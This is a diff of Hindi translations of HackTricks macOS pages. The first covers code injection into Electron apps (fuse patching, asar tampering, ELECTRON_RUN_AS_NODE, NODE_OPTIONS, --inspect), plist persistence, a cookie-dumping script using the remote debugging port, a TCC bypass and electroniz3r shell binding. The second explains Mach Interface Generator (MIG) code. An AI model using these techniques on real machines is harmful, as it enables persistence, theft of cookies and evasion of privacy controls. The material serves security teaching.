-macOS एप्लिकेशन में यह आमतौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
+macOS एप्लिकेशन्स में यह आमतौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
 ```bash
 grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
 Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
 ```
-आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछले स्ट्रिंग की खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में एक नंबर "0" या "1" देख सकते हैं जो प्रत्येक फ्यूज़ को अक्षम या सक्षम करता है। हेक्स कोड को संशोधित करें (`0x30` `0` है और `0x31` `1` है) ताकि **फ्यूज़ मान** संशोधित किए जा सकें।
+आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछली स्ट्रिंग के लिए खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में एक नंबर "0" या "1" देख सकते हैं जो दर्शाता है कि प्रत्येक फ्यूज अक्षम या सक्षम है। बस हेक्स कोड को मॉडिफाई करें (`0x30` है `0` और `0x31` है `1`) ताकि **फ्यूज मानों को संशोधित करें**।

-<figure><img src="../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

-ध्यान दें कि यदि आप इन संशोधित बाइट्स के साथ एक ऐप्लिकेशन के भीतर **`Electron Framework` बाइनरी** को **अधिलेखित** करने का प्रयास करते हैं, तो ऐप नहीं चलेगी।
+ध्यान दें कि यदि आप इन बाइट्स को संशोधित करके किसी एप्लिकेशन के अंदर **`Electron Framework` बाइनरी** को **ओवरराइट** करने की कोशिश करते हैं, तो ऐप चलेगा नहीं।

-## Electron ऐप्लिकेशन में कोड जोड़ने के लिए RCE
+## RCE इलेक्ट्रॉन एप्लिकेशन्स में कोड जोड़ना

-एक Electron ऐप द्वारा उपयोग किए जा रहे हो सकते हैं **बाहरी JS/HTML फ़ाइलें** हो सकती हैं, इसलिए एक हमलावर को इन फ़ाइलों में कोड संशोधित करने की अनुमति हो सकती है जिसका हस्ताक्षर जांचा नहीं जाएगा और ऐप के संदर्भ में अनियमित कोड को निष्पादित कर सकता है।
+इलेक्ट्रॉन ऐप जो **बाहरी JS/HTML फ़ाइलें** इस्तेमाल कर रहा हो सकता है, तो एक हमलावर इन फ़ाइलों में कोड इंजेक्ट कर सकता है जिसकी हस्ताक्षर की जांच नहीं की जाएगी और ऐप के संदर्भ में मनमाना कोड निष्पादित कर सकता है।

 {% hint style="danger" %}
-हालांकि, वर्तमान में 2 सीमाएं हैं:
+हालांकि, इस समय 2 सीमाएँ हैं:

-* **`kTCCServiceSystemPolicyAppBundles`** अनुमति की आवश्यकता होती है एक ऐप को संशोधित करने के लिए, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है।
-* संकलित **`asap`** फ़ाइल में आमतौर पर फ्यूज़ **`embeddedAsarIntegrityValidation`** और **`onlyLoadAppFromAsar`** सक्षम होते हैं
+* एक ऐप को संशोधित करने के लिए **`kTCCServiceSystemPolicyAppBundles`** अनुमति **आवश्यक** है, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है।
+* संकलित **`asap`** फ़ाइल में आमतौर पर फ्यूज **`embeddedAsarIntegrityValidation`** `और` **`onlyLoadAppFromAsar`** `सक्षम` होते हैं

-इस हमला मार्ग को अधिक कठिन (या असंभव) बनाना।
+इस हमले के मार्ग को अधिक जटिल (या असंभव) बनाते हैं।
 {% endhint %}

-ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को अनदेखा करना संभव है अगर आप ऐप्लिकेशन को एक अन्य निर्देशिका (जैसे **`/tmp`**) में कॉपी करके, फ़ोल्डर को **`app.app/Contents`** से **`app.app/NotCon`** में नामांकित करके, अपने **विषादी** कोड के साथ **asar** फ़ाइल को संशोधित करके, इसे फिर से **`app.app/Contents`** में नामांकित करके और इसे निष्पादित करते हैं।
+ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को बायपास करना संभव है, ऐप्लिकेशन को दूसरी डायरेक्टरी (जैसे **`/tmp`**) में कॉपी करके, फोल्डर **`app.app/Contents`** का नाम बदलकर **`app.app/NotCon`**, **संशोधित** करना आपके **दुर्भावनापूर्ण** कोड के साथ **asar** फ़ाइल, इसे वापस **`app.app/Contents`** के नाम पर बदलना और इसे निष्पादित करना।

-आप असार फ़ाइल से कोड को अनपैक कर सकते हैं:
+आप asar फ़ाइल से कोड अनपैक कर सकते हैं:
 ```bash
 npx asar extract app.asar app-decomp
 ```
@ -87,7 +89,7 @@ npx asar pack app-decomp app-new.asar
 ```
 ## `ELECTRON_RUN_AS_NODE` के साथ RCE <a href="#electron_run_as_node" id="electron_run_as_node"></a>

-[**दस्तावेज़**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node) के अनुसार, यदि इस env चर को सेट किया जाता है, तो यह प्रक्रिया एक साधारण Node.js प्रक्रिया के रूप में शुरू हो जाएगी।
+[**डॉक्स के अनुसार**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), यदि यह env वेरिएबल सेट है, तो यह प्रक्रिया को सामान्य Node.js प्रक्रिया के रूप में शुरू करेगा।

 {% code overflow="wrap" %}
 ```bash
@ -99,12 +101,12 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
 {% endcode %}

 {% hint style="danger" %}
-यदि फ्यूज **`RunAsNode`** अक्षम हो जाता है तो env वेरिएबल **`ELECTRON_RUN_AS_NODE`** को अनदेखा किया जाएगा, और यह काम नहीं करेगा।
+यदि fuse **`RunAsNode`** निष्क्रिय है तो env var **`ELECTRON_RUN_AS_NODE`** को अनदेखा किया जाएगा, और यह काम नहीं करेगा।
 {% endhint %}

-### ऐप प्लिस्ट से इंजेक्शन
+### App Plist से Injection

-[**यहां प्रस्तावित**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/) के रूप में, आप प्लिस्ट में इस env वेरिएबल का दुरुपयोग करके स्थिरता बनाए रखने के लिए इस्तेमाल कर सकते हैं:
+[**यहाँ प्रस्तावित**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/) के अनुसार, आप इस env variable का उपयोग plist में कर सकते हैं ताकि पर्सिस्टेंस बनाए रखा जा सके:
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -130,7 +132,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
 ```
 ## `NODE_OPTIONS` के साथ RCE

-आप एक अलग फ़ाइल में पेलोड संग्रहीत कर सकते हैं और इसे निष्पादित कर सकते हैं:
+आप पेलोड को एक अलग फाइल में संग्रहित कर सकते हैं और इसे निष्पादित कर सकते हैं:

 {% code overflow="wrap" %}
 ```bash
@ -143,14 +145,14 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
 {% endcode %}

 {% hint style="danger" %}
-यदि फ्यूज **`EnableNodeOptionsEnvironmentVariable`** **अक्षम** है, तो ऐप लॉन्च होने पर एनवायरनमेंट वेरिएबल **NODE\_OPTIONS** को **अनदेखा** करेगा जब तक एनवायरनमेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता है, जिसे फ्यूज **`RunAsNode`** भी **अनदेखा** करेगा।
+यदि fuse **`EnableNodeOptionsEnvironmentVariable`** **निष्क्रिय** है, तो ऐप **NODE\_OPTIONS** env var को **अनदेखा** करेगा जब तक कि env variable **`ELECTRON_RUN_AS_NODE`** सेट नहीं किया जाता, जिसे भी **अनदेखा** किया जाएगा यदि fuse **`RunAsNode`** निष्क्रिय है।

-यदि आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको यह **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
+यदि आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
 {% endhint %}

-### ऐप प्लिस्ट से इंजेक्शन
+### App Plist से Injection

-आप इस एनवायरनमेंट वेरिएबल का दुरुपयोग करके प्लिस्ट में इन कुंजीयों को जोड़कर स्थायित्व बनाए रख सकते हैं:
+आप इस env variable का दुरुपयोग plist में इन कुंजियों को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं:
 ```xml
 <dict>
 <key>EnvironmentVariables</key>
@ -166,9 +168,9 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
 <true/>
 </dict>
 ```
-## इंस्पेक्शन के साथ आरसीई
+## RCE के साथ निरीक्षण

-[**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे फ्लैग्स के साथ इलेक्ट्रॉन एप्लिकेशन को चलाते हैं, तो एक **डीबग पोर्ट खुल जाएगा** जिस पर आप कनेक्ट कर सकते हैं (उदाहरण के लिए `chrome://inspect` में से क्रोम से) और आप उस पर **कोड इंजेक्शन कर सकेंगे** या नए प्रोसेस चला सकेंगे।\
+[**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप Electron एप्लिकेशन को **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे फ्लैग्स के साथ निष्पादित करते हैं, तो एक **डीबग पोर्ट खुल जाएगा** जिससे आप उससे जुड़ सकते हैं (उदाहरण के लिए Chrome में `chrome://inspect` से) और आप उस पर **कोड इंजेक्ट कर सकते हैं** या यहां तक कि नए प्रोसेस भी लॉन्च कर सकते हैं।\
 उदाहरण के लिए:

 {% code overflow="wrap" %}
@ -180,14 +182,14 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
 {% endcode %}

 {% hint style="danger" %}
-यदि fuse**`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप लॉन्च होने पर नोड पैरामीटर (जैसे `--inspect`) को अनदेखा करेगा जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट न हो, जिसे अनदेखा किया जाएगा अगर fuse **`RunAsNode`** अक्षम है।
+यदि fuse**`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप **node पैरामीटर्स को अनदेखा करेगा** (जैसे `--inspect`) जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता, जिसे भी **अनदेखा किया जाएगा** यदि fuse **`RunAsNode`** अक्षम है।

-हालांकि, आप अभी भी **electron पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं, लेकिन पिछला पेलोड अन्य प्रक्रियाओं को निष्पादित करने के लिए काम नहीं करेगा।
+हालांकि, आप अभी भी **electron पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं लेकिन पिछला पेलोड अन्य प्रोसेसेस को निष्पादित करने के लिए काम नहीं करेगा।
 {% endhint %}

-पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके Electron ऐप से कुछ जानकारी चोरी की जा सकती है, जैसे कि ब्राउज़र का **इतिहास** (GET कमांड के साथ) या **कुकीज़** (जैसे कि वे ब्राउज़र के अंदर **डिक्रिप्ट** होते हैं और उन्हें देने वाला एक **json एंडपॉइंट** होता है)।
+पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके, आप Electron App से कुछ जानकारी चुरा सकते हैं जैसे कि **history** (GET कमांड्स के साथ) या ब्राउज़र के **cookies** (क्योंकि वे ब्राउज़र के अंदर **decrypted** होते हैं और एक **json endpoint** होता है जो उन्हें देगा)।

-आप यह कैसे कर सकते हैं इसे यहां [**यहां**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहां**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) सीख सकते हैं और ऑटोमेटिक टूल [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक सरल स्क्रिप्ट का उपयोग कर सकते हैं जैसे:
+आप यह कैसे कर सकते हैं इसके बारे में [**यहाँ**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहाँ**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) सीख सकते हैं और स्वचालित उपकरण [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक साधारण स्क्रिप्ट का उपयोग कर सकते हैं जैसे:
 ```python
 import websocket
 ws = websocket.WebSocket()
@ -195,11 +197,11 @@ ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00",
 ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
 print(ws.recv()
 ```
-[**इस ब्लॉग पोस्ट**](https://hackerone.com/reports/1274695) में, इस debugging का दुरुपयोग किया जाता है ताकि एक headless chrome **विभिन्न स्थानों पर विभिन्न फ़ाइलें डाउनलोड कर सके**।
+इस [**ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डिबगिंग का दुरुपयोग करके एक हेडलेस क्रोम को **मनमानी फाइलों को मनमाने स्थानों पर डाउनलोड करने** के लिए किया जाता है।

-### App Plist से Injection
+### App Plist से इंजेक्शन

-आप इस env variable का उपयोग करके plist में दुरुपयोग कर सकते हैं ताकि स्थिरता बनाए रखें और निम्नलिखित कुंजी जोड़ें:
+आप इस env वेरिएबल का दुरुपयोग प्लिस्ट में इन कीज़ को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं:
 ```xml
 <dict>
 <key>ProgramArguments</key>
@ -213,22 +215,22 @@ print(ws.recv()
 <true/>
 </dict>
 ```
-## TCC बाइपास पुराने संस्करणों का दुरुपयोग करके
+## पुराने संस्करणों का दुरुपयोग करके TCC बायपास

 {% hint style="success" %}
-macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता है। इसलिए, यदि आप किसी भी पिछले तकनीक के साथ किसी इलेक्ट्रॉन एप्लिकेशन में कोड संयोजित नहीं कर सकते हैं, तो आप पिछले संस्करण के एप्लिकेशन को डाउनलोड करके उसमें कोड संयोजित कर सकते हैं क्योंकि यह अभी भी TCC अधिकार प्राप्त करेगा (यदि ट्रस्ट कैश इसे रोकता नहीं है)।
+macOS का TCC डेमॉन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता है। इसलिए यदि आप **Electron एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** पिछली तकनीकों के साथ, आप एप्लिकेशन का पिछला संस्करण डाउनलोड कर सकते हैं और उसमें कोड इंजेक्ट कर सकते हैं क्योंकि उसे अभी भी TCC विशेषाधिकार मिलेंगे (जब तक कि Trust Cache इसे रोकता नहीं है)।
 {% endhint %}

-## गैर JS कोड चलाएँ
+## गैर JS कोड चलाना

-पिछली तकनीकों की मदद से आपको इलेक्ट्रॉन एप्लिकेशन के प्रक्रिया में JS कोड चलाने की अनुमति मिलेगी। हालांकि, ध्यान दें कि **बच्चा प्रक्रियाएं मूल एप्लिकेशन के समान सैंडबॉक्स प्रोफ़ाइल के तहत चलती हैं** और **उनकी TCC अनुमतियों को वे अनुकरण करते हैं**।\
-इसलिए, यदि आप कैमरा या माइक्रोफ़ोन तक पहुंच प्राप्त करने के लिए entitlements का दुरुपयोग करना चाहते हैं, तो आप बस प्रक्रिया से **एक और बाइनरी चला सकते हैं**।
+पिछली तकनीकें आपको **Electron एप्लिकेशन की प्रक्रिया के अंदर JS कोड चलाने की अनुमति देंगी**। हालांकि, याद रखें कि **चाइल्ड प्रोसेस माता-पिता एप्लिकेशन के समान सैंडबॉक्स प्रोफाइल के अंतर्गत चलते हैं** और **उनके TCC अनुमतियों को विरासत में प्राप्त करते हैं**।\
+इसलिए, यदि आप उदाहरण के लिए कैमरा या माइक्रोफोन तक पहुंचने के लिए अधिकारों का दुरुपयोग करना चाहते हैं, आप सिर्फ **प्रक्रिया से एक अन्य बाइनरी चला सकते हैं**।

-## स्वचालित संयोजन
+## स्वचालित इंजेक्शन

-टूल [**electroniz3r**](https://github.com/r3ggi/electroniz3r) का उपयोग करके आप आसानी से **विकल्पशील इलेक्ट्रॉन एप्लिकेशन** का पता लगा सकते हैं और उनमें कोड संयोजित कर सकते हैं। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा:
+उपकरण [**electroniz3r**](https://github.com/r3ggi/electroniz3r) का उपयोग करके आसानी से **कमजोर Electron एप्लिकेशनों को खोजने** और उनमें कोड इंजेक्ट करने के लिए किया जा सकता है। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा:

-आपको इसे खुद कंपाइल करना होगा और इसे इस तरह से उपयोग कर सकते हैं:
+आपको इसे स्वयं कंपाइल करना होगा और इसे इस तरह उपयोग कर सकते हैं:
 ```bash
 # Find electron apps
 ./electroniz3r list-apps
@ -272,12 +274,14 @@ Shell binding requested. Check `nc 127.0.0.1 12345`

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह!
-* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें और PR जमा करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **के माध्यम से।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
@ -2,21 +2,23 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
 * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी hacking tricks साझा करें, hacktricks repo** को PRs सबमिट करके [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

 </details>

-MIG को **Mach IPC कोड निर्माण की प्रक्रिया को सरल बनाने के लिए बनाया गया था**. यह मूल रूप से **सर्वर और क्लाइंट के संवाद के लिए आवश्यक कोड उत्पन्न करता है** एक निर्धारित परिभाषा के साथ. भले ही उत्पन्न कोड बदसूरत हो, एक डेवलपर को केवल इसे आयात करने की आवश्यकता होगी और उसका कोड पहले से कहीं अधिक सरल हो जाएगा.
+MIG को **Mach IPC कोड निर्माण की प्रक्रिया को सरल बनाने के लिए बनाया गया था**. यह मूल रूप से **सर्वर और क्लाइंट के संवाद के लिए आवश्यक कोड उत्पन्न करता है** एक निर्धारित परिभाषा के साथ. भले ही उत्पन्न कोड कुरूप हो, एक डेवलपर को केवल इसे आयात करना होगा और उसका कोड पहले से कहीं अधिक सरल हो जाएगा.

 ### उदाहरण

-एक परिभाषा फ़ाइल बनाएं, इस मामले में एक बहुत ही सरल फ़ंक्शन के साथ:
+एक परिभाषा फाइल बनाएं, इस मामले में एक बहुत ही सरल फंक्शन के साथ:

 {% code title="myipc.defs" %}
 ```cpp
@ -35,13 +37,13 @@ n2          :  uint32_t);
 ```
 {% endcode %}

-अब mig का उपयोग करके सर्वर और क्लाइंट कोड जेनरेट करें जो आपस में संवाद करने के लिए Subtract फंक्शन को कॉल कर सकें:
+अब mig का उपयोग करके सर्वर और क्लाइंट कोड जेनरेट करें जो आपस में संवाद करने और Subtract फंक्शन को कॉल करने में सक्षम होंगे:
 ```bash
 mig -header myipcUser.h -sheader myipcServer.h myipc.defs
 ```
-कई नई फाइलें वर्तमान डायरेक्टरी में बनाई जाएंगी।
+नई फाइलें वर्तमान डायरेक्टरी में बनाई जाएंगी।

-फाइलों **`myipcServer.c`** और **`myipcServer.h`** में आपको **`SERVERPREFmyipc_subsystem`** का घोषणा और परिभाषा मिलेगी, जो मूल रूप से प्राप्त संदेश ID के आधार पर कॉल करने के लिए फंक्शन को परिभाषित करता है (हमने 500 की शुरुआती संख्या का संकेत दिया है):
+फाइलों **`myipcServer.c`** और **`myipcServer.h`** में आप **`SERVERPREFmyipc_subsystem`** स्ट्रक्चर की घोषणा और परिभाषा पा सकते हैं, जो मूल रूप से प्राप्त संदेश ID के आधार पर कॉल करने के लिए फंक्शन को परिभाषित करता है (हमने 500 की शुरुआती संख्या का संकेत दिया है):

 {% tabs %}
 {% tab title="myipcServer.c" %}
@ -93,7 +95,7 @@ return 0;
 return SERVERPREFmyipc_subsystem.routine[msgh_id].stub_routine;
 }
 ```
-इस उदाहरण में हमने परिभाषाओं में केवल 1 फ़ंक्शन को परिभाषित किया है, लेकिन यदि हमने अधिक फ़ंक्शन परिभाषित किए होते, तो वे **`SERVERPREFmyipc_subsystem`** की एरे में शामिल होते और पहले वाले को ID **500** के लिए असाइन किया जाता, दूसरे को ID **501** के लिए...
+इस उदाहरण में हमने परिभाषाओं में केवल 1 फ़ंक्शन को परिभाषित किया है, लेकिन यदि हमने अधिक फ़ंक्शन परिभाषित किए होते, तो वे **`SERVERPREFmyipc_subsystem`** की एरे में होते और पहले वाले को ID **500** के लिए असाइन किया जाता, दूसरे को ID **501** के लिए...

 वास्तव में इस संबंध को **`subsystem_to_name_map_myipc`** स्ट्रक्चर में पहचाना जा सकता है जो कि **`myipcServer.h`** में है:
 ```c
@ -136,9 +138,9 @@ return FALSE;
 }
 </code></pre>

-ID द्वारा कॉल करने के लिए फंक्शन तक पहुँचने वाली पहले उजागर की गई पंक्तियों की जाँच करें।
+पहले हाइलाइट की गई पंक्तियों की जांच करें जो ID द्वारा कॉल करने के लिए फंक्शन तक पहुंचती हैं।

-निम्नलिखित में एक सरल **सर्वर** और **क्लाइंट** बनाने के लिए कोड है जहाँ क्लाइंट सर्वर से Subtract फंक्शन को कॉल कर सकता है:
+निम्नलिखित में एक सरल **सर्वर** और **क्लाइंट** बनाने के लिए कोड है जहां क्लाइंट सर्वर से Subtract फंक्शन को कॉल कर सकता है:

 {% tabs %}
 {% tab title="myipc_server.c" %}
@ -206,7 +208,7 @@ USERPREFSubtract(port, 40, 2);

 चूंकि कई बाइनरीज़ अब MIG का उपयोग करके mach पोर्ट्स को उजागर करती हैं, यह जानना दिलचस्प है कि **MIG का उपयोग किया गया था** और **प्रत्येक संदेश ID के साथ MIG क्या कार्य करता है**।

-[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/#jtool2) Mach-O बाइनरी से MIG जानकारी को पार्स कर सकता है जो संदेश ID को इंगित करता है और कार्य को पहचानता है जिसे निष्पादित करना है:
+[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/#jtool2) एक Mach-O बाइनरी से MIG जानकारी को पार्स कर सकता है जो संदेश ID को इंगित करता है और कार्य को पहचानने के लिए:
 ```bash
 jtool2 -d __DATA.__const myipc_server | grep MIG
 ```
@ -215,7 +217,7 @@ jtool2 -d __DATA.__const myipc_server | grep MIG
 <pre class="language-c"><code class="lang-c">int _myipc_server(int arg0, int arg1) {
 var_10 = arg0;
 var_18 = arg1;
-// प्रारंभिक निर्देश सही फंक्शन पॉइंटर्स को खोजने के लिए
+// प्रारंभिक निर्देश सही फ़ंक्शन पॉइंटर्स को खोजने के लिए
 *(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f;
 *(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
 *(int32_t *)(var_18 + 0x4) = 0x24;
@ -224,20 +226,20 @@ var_18 = arg1;
 *(int32_t *)(var_18 + 0x10) = 0x0;
 if (*(int32_t *)(var_10 + 0x14) &#x3C;= 0x1f4 &#x26;&#x26; *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
 rax = *(int32_t *)(var_10 + 0x14);
-// sign_extend_64 फंक्शन को कॉल करना जो इस फंक्शन की पहचान में मदद कर सकता है
-// यह rax में उस पॉइंटर को स्टोर करता है जिसे कॉल किया जाना है
-// 0x100004040 पते का उपयोग देखें (फंक्शन्स के पते की सरणी)
+// sign_extend_64 को कॉल करने के लिए जो इस फ़ंक्शन की पहचान में मदद कर सकता है
+// यह rax में उस कॉल का पॉइंटर स्टोर करता है जिसे कॉल किया जाना है
+// पते 0x100004040 की जांच करें (फ़ंक्शन्स के पते की सरणी)
 // 0x1f4 = 500 (प्रारंभिक ID)
